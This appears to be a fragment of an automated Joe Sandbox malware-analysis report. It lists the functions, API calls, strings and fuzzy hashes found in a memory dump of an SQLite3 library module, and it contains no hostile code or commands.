                                                    • Opcode Fuzzy Hash: f50511680cdd63bc2ebdfd191ed6b6942f2258144978115b265b51410ecbbdd7
                                                    • Instruction Fuzzy Hash: 7E911A70A18E05CFEB808FAAC44575E7AF5BB8B309F24882ED4589B385D779C8C5CB51

                                                    Control-flow Graph

                                                    APIs
                                                    • sqlite3_free.SQLITE3 ref: 61E39283
                                                      • Part of subcall function 61E38F24: sqlite3_free.SQLITE3 ref: 61E38F96
                                                    • sqlite3_win32_is_nt.SQLITE3 ref: 61E392B0
                                                    • sqlite3_free.SQLITE3 ref: 61E39315
                                                    • sqlite3_free.SQLITE3 ref: 61E39320
                                                    • sqlite3_win32_is_nt.SQLITE3 ref: 61E3938F
                                                    • CreateFileW.KERNEL32 ref: 61E393C8
                                                    • sqlite3_free.SQLITE3 ref: 61E39480
                                                    • sqlite3_free.SQLITE3 ref: 61E3948B
                                                      • Part of subcall function 61E1768B: sqlite3_win32_sleep.SQLITE3 ref: 61E176E3
                                                    • sqlite3_free.SQLITE3 ref: 61E394FC
                                                    • sqlite3_free.SQLITE3 ref: 61E39507
                                                    • sqlite3_uri_boolean.SQLITE3 ref: 61E39545
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_win32_is_nt$CreateFilesqlite3_uri_booleansqlite3_win32_sleep
                                                    • String ID: winOpen
                                                    • API String ID: 1995518269-2556188131
                                                    • Opcode ID: 1b8fcbb28f5a7d6b79565de4cd3579e2e247341c965f8c6450933e380b61ef31
                                                    • Instruction ID: 53689baeb18e22f38f1226e3f8eaef332e1ed591a63873ad18f414831dffe986
                                                    • Opcode Fuzzy Hash: 1b8fcbb28f5a7d6b79565de4cd3579e2e247341c965f8c6450933e380b61ef31
                                                    • Instruction Fuzzy Hash: 48B1C570A047598BEB10DFA9D58478EBBF0FF89318F208929E899DB380D775D885CB51

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: attached databases must use the same text encoding as main database$b&a$d&a$sqlite_master$sqlite_temp_master$unsupported file format
                                                    • API String ID: 0-3890827734
                                                    • Opcode ID: 9f33a0a7deea58475428160c468323754ebf23689947eb0c0736ffcef58cc0c5
                                                    • Instruction ID: 0ddebd33cc4247b4945e85eb74ad4c8fee94b001f425d445053a39311ac94fce
                                                    • Opcode Fuzzy Hash: 9f33a0a7deea58475428160c468323754ebf23689947eb0c0736ffcef58cc0c5
                                                    • Instruction Fuzzy Hash: 4B9124B4E047488BDB55CFAAC480A8EFBF1AF88318F24C46DD8589B345D736E856CB41

                                                    Control-flow Graph

                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,-00000001,?,61E14051), ref: 61E13F35
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,-00000001,?,61E14051), ref: 61E13F8C
                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,-00000001,?,61E14051), ref: 61E13FA9
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,-00000001,?,61E14051), ref: 61E13FD0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                    • String ID: La
                                                    • API String ID: 1477753154-3337869896
                                                    • Opcode ID: bd3d05b8a36dfb17a24570c75878a39b19ec29d31c865c37e54d81d076e473d9
                                                    • Instruction ID: c36e1626ea23d3cc880b814590b4f86d73eeafdf946a10c1b65b5e7e86c9be42
                                                    • Opcode Fuzzy Hash: bd3d05b8a36dfb17a24570c75878a39b19ec29d31c865c37e54d81d076e473d9
                                                    • Instruction Fuzzy Hash: 52116770A18F418FDB00EFAAC48565977F4FB4A329B24883EE684CB300E730D8D58B52

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: memcmp$sqlite3_mutex_try
                                                    • String ID: 0
                                                    • API String ID: 2794522359-4108050209

                                                    APIs
                                                      • Part of subcall function 61E03E4E: sqlite3_stricmp.SQLITE3 ref: 61E03E7B
                                                      • Part of subcall function 61E03E4E: sqlite3_stricmp.SQLITE3 ref: 61E03E93
                                                    • sqlite3_strnicmp.SQLITE3 ref: 61E5EE71
                                                      • Part of subcall function 61E045BA: sqlite3_stricmp.SQLITE3 ref: 61E045ED
                                                    Similarity
                                                    • API ID: sqlite3_stricmp$sqlite3_strnicmp
                                                    • String ID: no such table$no such view
                                                    • API String ID: 2198927396-301769730

                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: winRead
                                                    • API String ID: 2738559852-2759563040

                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E10032
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E100DA
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 1477753154-0

                                                    Similarity
                                                    • API ID: mallocsqlite3_log
                                                    • String ID:
                                                    • API String ID: 2785431543-0

                                                    APIs
                                                    • sqlite3_free.SQLITE3 ref: 61E113EF
                                                      • Part of subcall function 61E09B91: sqlite3_mutex_enter.SQLITE3 ref: 61E09BB0
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_mutex_enter
                                                    • String ID:
                                                    • API String ID: 1324421599-0
                                                    APIs
                                                    • sqlite3_value_int.SQLITE3 ref: 61E24416
                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E24436
                                                    • sqlite3_value_blob.SQLITE3 ref: 61E24443
                                                    • sqlite3_value_text.SQLITE3 ref: 61E2445A
                                                    • sqlite3_value_int.SQLITE3 ref: 61E244AA
                                                    • sqlite3_result_text64.SQLITE3 ref: 61E245FA
                                                    • sqlite3_result_blob64.SQLITE3 ref: 61E24654
                                                    Similarity
                                                    • API ID: sqlite3_value_int$sqlite3_result_blob64sqlite3_result_text64sqlite3_value_blobsqlite3_value_bytessqlite3_value_text
                                                    • String ID:
                                                    • API String ID: 3992148849-0
                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E6F69E
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E6F8AE
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                    • String ID: BINARY$INTEGER$^Ma
                                                    • API String ID: 1477753154-3492570885
                                                    APIs
                                                    Similarity
                                                    • API ID: sqlite3_malloc$memcmpsqlite3_freesqlite3_realloc
                                                    • String ID:
                                                    • API String ID: 1984881590-0
                                                    APIs
                                                    • GetSystemTimeAsFileTime.KERNEL32 ref: 61E89A49
                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E89A5A
                                                    • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E89A62
                                                    • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E89A6A
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E89A79
                                                    Similarity
                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                    • String ID:
                                                    • API String ID: 1445889803-0
                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E42D14
                                                      • Part of subcall function 61E1318F: sqlite3_mutex_try.SQLITE3(?,?,?,61E1320F), ref: 61E1312F
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E42D2D
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E42E41
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E4325C
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    APIs
                                                    • sqlite3_bind_int64.SQLITE3 ref: 61E290FE
                                                      • Part of subcall function 61E28F2C: sqlite3_mutex_leave.SQLITE3 ref: 61E28F6B
                                                    • sqlite3_bind_double.SQLITE3 ref: 61E29121
                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E291BD
                                                    • sqlite3_bind_zeroblob.SQLITE3 ref: 61E291E2
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E29202
                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E16C75
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E16CD8
                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E16B2D
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E16B6D
                                                    APIs
                                                      • Part of subcall function 61E28BD3: sqlite3_log.SQLITE3 ref: 61E28C01
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E28D80
                                                    APIs
                                                      • Part of subcall function 61E28BD3: sqlite3_log.SQLITE3 ref: 61E28C01
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E29031
                                                    APIs
                                                      • Part of subcall function 61E28BD3: sqlite3_log.SQLITE3 ref: 61E28C01
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E290AD
                                                    APIs
                                                      • Part of subcall function 61E28BD3: sqlite3_log.SQLITE3 ref: 61E28C01
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E28F1D
                                                    APIs
                                                      • Part of subcall function 61E28BD3: sqlite3_log.SQLITE3 ref: 61E28C01
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E28F6B
                                                    APIs
                                                      • Part of subcall function 61E28BD3: sqlite3_log.SQLITE3 ref: 61E28C01
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E28FC4
                                                    APIs
                                                    • sqlite3_bind_int64.SQLITE3 ref: 61E28F9A
                                                      • Part of subcall function 61E28F2C: sqlite3_mutex_leave.SQLITE3 ref: 61E28F6B
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_bind_int64sqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 3064317574-0
                                                    APIs
                                                    • sqlite3_free.SQLITE3 ref: 61E38F96
                                                    • sqlite3_snprintf.SQLITE3 ref: 61E38FC7
                                                      • Part of subcall function 61E23290: sqlite3_vsnprintf.SQLITE3 ref: 61E232B1
                                                    • sqlite3_free.SQLITE3 ref: 61E3910B
                                                    • sqlite3_free.SQLITE3 ref: 61E39148
                                                    • sqlite3_free.SQLITE3 ref: 61E39183
                                                    • sqlite3_snprintf.SQLITE3 ref: 61E391B5
                                                    • sqlite3_randomness.SQLITE3 ref: 61E391D1
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_randomnesssqlite3_vsnprintf
                                                    • String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname3$winGetTempname4$winGetTempname5
                                                    • API String ID: 3041771859-3409217566
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_is_nt
                                                    • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                    • API String ID: 3752053736-2111127023
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_malloc64sqlite3_mprintf$sqlite3_snprintf$sqlite3_mutex_entersqlite3_mutex_leavesqlite3_strnicmp
                                                    • String ID: .$sqlite3_extension_init$te3_
                                                    • API String ID: 2803375525-613441610
                                                    APIs
                                                    • sqlite3_stricmp.SQLITE3 ref: 61E24C3A
                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 61E24C46
                                                    • sqlite3_value_int.SQLITE3 ref: 61E24C53
                                                    • sqlite3_stricmp.SQLITE3 ref: 61E24C7B
                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 61E24C87
                                                    • sqlite3_value_int.SQLITE3 ref: 61E24C96
                                                    • sqlite3_stricmp.SQLITE3 ref: 61E24CB6
                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 61E24CC2
                                                    • sqlite3_value_int.SQLITE3 ref: 61E24CD1
                                                    • sqlite3_stricmp.SQLITE3 ref: 61E24CFD
                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 61E24D09
                                                    • sqlite3_value_int.SQLITE3 ref: 61E24D17
                                                    Similarity
                                                    • API ID: sqlite3_stricmpsqlite3_value_intsqlite3_value_numeric_type
                                                    • String ID:
                                                    • API String ID: 2723203140-0
                                                    • Opcode ID: 0ca5c5d7c75c8d46d1d0a7c1e437178b530c3527eb26bc30356c70dfd12e0b9b
                                                    • Instruction ID: f4d03218b954966bda3f34bff198905b294d1d14d0796639f494b9cc0f561a75
                                                    • Opcode Fuzzy Hash: 0ca5c5d7c75c8d46d1d0a7c1e437178b530c3527eb26bc30356c70dfd12e0b9b
                                                    • Instruction Fuzzy Hash: 8F41F6B0608B468AC305AF65C99165EBBF1BFC434CF75CE2EC8958B350E739D8919B42
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: memcmp$sqlite3_mprintf$sqlite3_malloc64$sqlite3_freesqlite3_vfs_find
                                                    • String ID: @$access$cache
                                                    • API String ID: 1538829708-1361544076
                                                    • Opcode ID: 1c28c90d1831b6ad3e80e3b9e627978afb1c0c80aa185386d0e77e5d1ae255d4
                                                    • Instruction ID: 21ad0e45d631a2c2f9aeebf40f265e80b76eb728aad9cf8931759efcab591dbc
                                                    • Opcode Fuzzy Hash: 1c28c90d1831b6ad3e80e3b9e627978afb1c0c80aa185386d0e77e5d1ae255d4
                                                    • Instruction Fuzzy Hash: 8CD15E709083658FDB118FA8C4803AEBBF5AFCA318F68C46ED895AB351D335D446DB52
                                                    APIs
                                                    • sqlite3_free.SQLITE3 ref: 61E395FD
                                                      • Part of subcall function 61E09B91: sqlite3_mutex_enter.SQLITE3 ref: 61E09BB0
                                                    • sqlite3_snprintf.SQLITE3 ref: 61E39629
                                                    • sqlite3_free.SQLITE3 ref: 61E3965C
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E3967C
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E39692
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E396A6
                                                    • sqlite3_realloc64.SQLITE3 ref: 61E39789
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E398B0
                                                    Strings
                                                    Similarity
                                                    • API ID: sqlite3_mutex_enter$sqlite3_freesqlite3_mutex_leave$sqlite3_realloc64sqlite3_snprintf
                                                    • String ID: winOpenShm$winShmMap1$winShmMap2$winShmMap3
                                                    • API String ID: 424382227-1629717226
                                                    • Opcode ID: bc001d11ef045672849579530d998e397025a7d30bcfae3080b291363083ef89
                                                    • Instruction ID: d11ebc3dcc47e6cd33e973e0e9579bb22dbe22f382b668537ce984c2e03aeb57
                                                    • Opcode Fuzzy Hash: bc001d11ef045672849579530d998e397025a7d30bcfae3080b291363083ef89
                                                    • Instruction Fuzzy Hash: D6D113B4A08752CFDB00DF69C48065ABBF1BF89358F25C86DE8889B354DB35D845CB92
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: sqlite3_result_error$sqlite3_value_bytes$sqlite3_db_configsqlite3_freesqlite3_mprintfsqlite3_result_blobsqlite3_value_blobsqlite3_value_text
                                                    • String ID: out of memory
                                                    • API String ID: 2048698484-2599737071
                                                    • Opcode ID: 58418c79be000a13f7557e39a7959b66ee966b4ed69db67a998b47f69df1e70b
                                                    • Instruction ID: 732aa0b1555792cd0f40343f184ced652c5c1ad470ef53a03935a3f2a088fb1d
                                                    • Opcode Fuzzy Hash: 58418c79be000a13f7557e39a7959b66ee966b4ed69db67a998b47f69df1e70b
                                                    • Instruction Fuzzy Hash: DF4193B4909766DBC710AF69C48465DBBF0BF89764F21CA1DE8A89B390D334D881CF52
                                                    APIs
                                                    Similarity
                                                    • API ID: sqlite3_value_text$sqlite3_value_int$sqlite3_mallocsqlite3_result_error
                                                    • String ID:
                                                    • API String ID: 3802728871-0
                                                    • Opcode ID: efb69bd8074eed61715a8ea6351c35d197c48b6daca6edd2f60631f30aece9ea
                                                    • Instruction ID: 66a0afb184cb1f036ebb7fb7bb074d62e5ad442047e640b865ca154a233d0956
                                                    • Opcode Fuzzy Hash: efb69bd8074eed61715a8ea6351c35d197c48b6daca6edd2f60631f30aece9ea
                                                    • Instruction Fuzzy Hash: 77128E74D04329DFDB60DF68C984B8DBBF1BB88314F1085AAE998A7340E7349A85CF01
                                                    APIs
                                                    • sqlite3_mprintf.SQLITE3 ref: 61E36F64
                                                      • Part of subcall function 61E3579B: sqlite3_initialize.SQLITE3 ref: 61E357A1
                                                      • Part of subcall function 61E3579B: sqlite3_vmprintf.SQLITE3 ref: 61E357BB
                                                    Strings
                                                    Similarity
                                                    • API ID: sqlite3_initializesqlite3_mprintfsqlite3_vmprintf
                                                    • String ID: + $ AND $ NOT $ OR $"$(,)?
                                                    • API String ID: 2841607023-3708749232
                                                    • Opcode ID: 3dc145415827c46375544632d64da83e32d07bfc6996ff04c81ee762814bcafc
                                                    • Instruction ID: 67c0e6f688afe049bc0bd5c99cd1f37295a6981cad68107400e6549990eada02
                                                    • Opcode Fuzzy Hash: 3dc145415827c46375544632d64da83e32d07bfc6996ff04c81ee762814bcafc
                                                    • Instruction Fuzzy Hash: B59149B5E08266CFDB11CFA8C48069AFBF1BF89314F25C5A9D894AB351D374D841CBA1
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_result_value
                                                    • String ID: NULL
                                                    • API String ID: 336169149-324932091
                                                    • Opcode ID: 63035dac4f96d1bb80cd73cdb533cadc555623b5f5bc5f0300cfff130f29f961
                                                    • Instruction ID: 0b6898894d041e9d19db71ef6033f8d6bcb45ddca593b5b630c1b9fe67082778
                                                    • Opcode Fuzzy Hash: 63035dac4f96d1bb80cd73cdb533cadc555623b5f5bc5f0300cfff130f29f961
                                                    • Instruction Fuzzy Hash: 986191705083868FD7119F68C5A4B9ABFF2AF89314F28CA5DD4C88B395D739C845CB42
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: strncmp
                                                    • String ID: -$-$0$]$false$null$true$}
                                                    • API String ID: 1114863663-1443276563
                                                    • Opcode ID: 60f056452a07dd69d569e7422431dd27ed235a79a6ab2a8e599c1708af961d9b
                                                    • Instruction ID: 93ab420c9c69ecb634fb86b2094d29de9a7b2d1480264f5dd4a69f45d190dd3b
                                                    • Opcode Fuzzy Hash: 60f056452a07dd69d569e7422431dd27ed235a79a6ab2a8e599c1708af961d9b
                                                    • Instruction Fuzzy Hash: 54D1E178A0C2464EEB15CFA8C49A7EABBF1BF45308F68C65AD4958738EC339D446C701
                                                    APIs
                                                      • Part of subcall function 61E0A189: sqlite3_free.SQLITE3 ref: 61E0A198
                                                      • Part of subcall function 61E0A189: sqlite3_free.SQLITE3 ref: 61E0A1A3
                                                    • sqlite3_value_text.SQLITE3 ref: 61E3833A
                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E3834D
                                                    • sqlite3_malloc64.SQLITE3 ref: 61E38362
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_malloc64sqlite3_value_bytessqlite3_value_text
                                                    • String ID:
                                                    • API String ID: 3723316075-0
                                                    • Opcode ID: 2289b546ea19ac45977341610254b224ec78ea57a54cf2e6bfd4a02c42304627
                                                    • Instruction ID: 4718e35c64af05013497ab148a38cbf99aa608c08a383500cc57ab354ef58589
                                                    • Opcode Fuzzy Hash: 2289b546ea19ac45977341610254b224ec78ea57a54cf2e6bfd4a02c42304627
                                                    • Instruction Fuzzy Hash: 737135B09042558FDB00CF69C484B9ABBF0BF88318F25C5ADD859CB369E738D885CB91
                                                    APIs
                                                    Similarity
                                                    • API ID: sqlite3_value_bytessqlite3_value_text$memcmpsqlite3_result_error_toobig
                                                    • String ID:
                                                    • API String ID: 3428878466-0
                                                    • Opcode ID: 48a8e361665ce52a7e02b3dd367f3043eb564be8f1ba6dead23184c5433a1418
                                                    • Instruction ID: 18481baacc06119b3b195b6085c61c3cbdf7fdec467d95e9756de9e44cabca61
                                                    • Opcode Fuzzy Hash: 48a8e361665ce52a7e02b3dd367f3043eb564be8f1ba6dead23184c5433a1418
                                                    • Instruction Fuzzy Hash: 8B71E074E042599FCB00DFA9D89099DBBF1BF88314F24856AE898EB344E735E842CF51
                                                    APIs
                                                    Similarity
                                                    • API ID: sqlite3_free
                                                    • String ID:
                                                    • API String ID: 2313487548-0
                                                    • Opcode ID: cc8bbecdeb9c1dfda9548ace6e0444fd38f1078339e74ce32c513f6c2a7c387e
                                                    • Instruction ID: 9b2825bae4ba0860af8edb1d6e48429170ab63dde003ac776ee4b90c104cb99e
                                                    • Opcode Fuzzy Hash: cc8bbecdeb9c1dfda9548ace6e0444fd38f1078339e74ce32c513f6c2a7c387e
                                                    • Instruction Fuzzy Hash: 16114774618A428BCB40AF7CC0C5419BBE4EF48325B928D9DDCC98B305D734D8A09F55
                                                    Strings
                                                    Similarity
                                                    • API ID:
                                                    • String ID: false$null$true
                                                    • API String ID: 0-2913297407
                                                    APIs
                                                    • sqlite3_malloc64.SQLITE3 ref: 61E6F9E3
                                                    • sqlite3_exec.SQLITE3 ref: 61E6FA16
                                                    • sqlite3_free_table.SQLITE3 ref: 61E6FA30
                                                    • sqlite3_free.SQLITE3 ref: 61E6FA44
                                                    • sqlite3_mprintf.SQLITE3 ref: 61E6FA57
                                                    • sqlite3_free.SQLITE3 ref: 61E6FA64
                                                    • sqlite3_free.SQLITE3 ref: 61E6FA7D
                                                      • Part of subcall function 61E09B91: sqlite3_mutex_enter.SQLITE3 ref: 61E09BB0
                                                    • sqlite3_free_table.SQLITE3 ref: 61E6FA92
                                                      • Part of subcall function 61E09CF9: sqlite3_free.SQLITE3 ref: 61E09D27
                                                    • sqlite3_realloc64.SQLITE3 ref: 61E6FAB6
                                                    • sqlite3_free_table.SQLITE3 ref: 61E6FAC8
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_free_table$sqlite3_execsqlite3_malloc64sqlite3_mprintfsqlite3_mutex_entersqlite3_realloc64
                                                    • String ID:
                                                    • API String ID: 3621699333-0
                                                    APIs
                                                    • sqlite3_step.SQLITE3(?,?,?,?,?,?,?,00000000,00000000,?,61E76430), ref: 61E75F3C
                                                    • sqlite3_finalize.SQLITE3 ref: 61E75FBC
                                                    • sqlite3_finalize.SQLITE3 ref: 61E7600A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: sqlite3_finalize$sqlite3_step
                                                    • String ID: bWa$integer$null$real
                                                    • API String ID: 2395141310-37276400
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_malloc
                                                    • String ID:
                                                    • API String ID: 423083942-0
                                                    APIs
                                                    • sqlite3_value_text.SQLITE3 ref: 61E25663
                                                    • sqlite3_result_error_toobig.SQLITE3 ref: 61E25744
                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E2576A
                                                    • sqlite3_snprintf.SQLITE3 ref: 61E259E6
                                                    • sqlite3_snprintf.SQLITE3 ref: 61E25A13
                                                    • sqlite3_snprintf.SQLITE3 ref: 61E25A1D
                                                    • sqlite3_snprintf.SQLITE3 ref: 61E25A83
                                                    • sqlite3_result_text.SQLITE3 ref: 61E25BA6
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: sqlite3_snprintf$sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                    • String ID:
                                                    • API String ID: 2444656285-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
